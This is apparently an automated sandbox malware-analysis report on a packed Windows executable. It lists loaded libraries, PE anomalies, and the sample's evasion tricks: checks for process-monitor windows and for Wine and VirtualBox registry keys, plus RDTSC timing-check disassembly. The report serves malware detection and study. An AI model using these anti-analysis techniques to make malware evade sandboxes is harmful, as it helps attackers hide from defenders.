Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: file.exe

Static file information: File size 2936320 > 1048576

Source: file.exe

Static PE information: Raw size of bijpfrbm is bigger than: 0x100000 < 0x2a3600

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.900000.0.unpack :EW;.rsrc :W;.idata :W;bijpfrbm:EW;gyofjiju:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;bijpfrbm:EW;gyofjiju:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x2d44aa should be: 0x2ce22b

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: bijpfrbm
Source: file.exe	Static PE information: section name: gyofjiju
Source: file.exe	Static PE information: section name: .taggant

Source: file.exe

Static PE information: section name: entropy: 7.984047314894568

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 964601 second address: 963EB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E78823266h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F5E78823260h 0x00000010 nop 0x00000011 jng 00007F5E7882325Ch 0x00000017 push dword ptr [ebp+122D1485h] 0x0000001d jmp 00007F5E7882325Ah 0x00000022 call dword ptr [ebp+122D1DB6h] 0x00000028 pushad 0x00000029 jnp 00007F5E78823257h 0x0000002f jmp 00007F5E78823262h 0x00000034 xor eax, eax 0x00000036 jmp 00007F5E78823263h 0x0000003b mov edx, dword ptr [esp+28h] 0x0000003f cld 0x00000040 mov dword ptr [ebp+122D3CCDh], eax 0x00000046 js 00007F5E7882325Ch 0x0000004c mov dword ptr [ebp+122D20A3h], edx 0x00000052 xor dword ptr [ebp+122D20A3h], ecx 0x00000058 mov esi, 0000003Ch 0x0000005d pushad 0x0000005e xor edx, dword ptr [ebp+122D3D21h] 0x00000064 popad 0x00000065 clc 0x00000066 add esi, dword ptr [esp+24h] 0x0000006a mov dword ptr [ebp+122D20A3h], edx 0x00000070 lodsw 0x00000072 jng 00007F5E7882325Ch 0x00000078 mov dword ptr [ebp+122D29D9h], esi 0x0000007e add eax, dword ptr [esp+24h] 0x00000082 jmp 00007F5E78823269h 0x00000087 mov ebx, dword ptr [esp+24h] 0x0000008b add dword ptr [ebp+122D1F53h], ebx 0x00000091 push eax 0x00000092 push eax 0x00000093 push edx 0x00000094 push eax 0x00000095 push edx 0x00000096 pushad 0x00000097 popad 0x00000098 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 963EB7 second address: 963ECC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E792621F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD4CB0 second address: AD4CB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD91EB second address: AD91F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD91F2 second address: AD91F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD91F8 second address: AD9201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD9201 second address: AD9230 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5E78823256h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F5E7882326Fh 0x00000016 jmp 00007F5E78823267h 0x0000001b push edi 0x0000001c pop edi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD9505 second address: AD9511 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD9511 second address: AD951B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD951B second address: AD951F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD966C second address: AD9671 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD9671 second address: AD9699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F5E792621F6h 0x0000000d popad 0x0000000e pushad 0x0000000f jc 00007F5E792621E6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD9699 second address: AD96A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD9819 second address: AD981F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD981F second address: AD982A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD99C6 second address: AD9A05 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5E792621E6h 0x00000008 jmp 00007F5E792621F8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 jmp 00007F5E792621F5h 0x00000015 jo 00007F5E792621E6h 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADC31D second address: ADC327 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5E78823256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADC327 second address: ADC3E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E792621F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 61141062h 0x00000010 or dword ptr [ebp+122D324Dh], ebx 0x00000016 push 00000003h 0x00000018 mov ecx, 3167BF02h 0x0000001d push 00000000h 0x0000001f movzx edi, di 0x00000022 mov dword ptr [ebp+122D1EF7h], ebx 0x00000028 push 00000003h 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007F5E792621E8h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 0000001Bh 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 jne 00007F5E792621ECh 0x0000004a push BE1653B2h 0x0000004f jmp 00007F5E792621F8h 0x00000054 xor dword ptr [esp], 7E1653B2h 0x0000005b lea ebx, dword ptr [ebp+1244C19Bh] 0x00000061 pushad 0x00000062 adc eax, 732E8C3Fh 0x00000068 jmp 00007F5E792621F7h 0x0000006d popad 0x0000006e movsx edx, bx 0x00000071 xchg eax, ebx 0x00000072 jno 00007F5E792621F0h 0x00000078 pushad 0x00000079 push eax 0x0000007a pop eax 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADC47A second address: ADC47E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADC47E second address: ADC488 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5E792621E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADC488 second address: ADC49C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E78823260h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADC49C second address: ADC4FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E792621EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 13F8A4CCh 0x00000012 mov dword ptr [ebp+122D2071h], ecx 0x00000018 push 00000003h 0x0000001a mov cx, B572h 0x0000001e push 00000000h 0x00000020 mov edi, eax 0x00000022 push ebx 0x00000023 movsx edi, di 0x00000026 pop ecx 0x00000027 push 00000003h 0x00000029 mov dword ptr [ebp+122D1F53h], edi 0x0000002f call 00007F5E792621E9h 0x00000034 push edx 0x00000035 push eax 0x00000036 pushad 0x00000037 popad 0x00000038 pop eax 0x00000039 pop edx 0x0000003a push eax 0x0000003b push esi 0x0000003c jbe 00007F5E792621ECh 0x00000042 pop esi 0x00000043 mov eax, dword ptr [esp+04h] 0x00000047 push eax 0x00000048 push edx 0x00000049 jg 00007F5E792621E8h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADC4FF second address: ADC509 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5E7882325Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADC509 second address: ADC51B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F5E792621E6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADC51B second address: ADC52F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E78823260h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADC52F second address: ADC578 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E792621F6h 0x00000008 jmp 00007F5E792621F5h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F5E792621F2h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADC578 second address: ADC582 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F5E78823256h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADC62C second address: ADC66B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 push eax 0x00000007 jmp 00007F5E792621F3h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F5E792621F9h 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADC66B second address: ADC675 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F5E78823256h 0x0000000a rdtsc
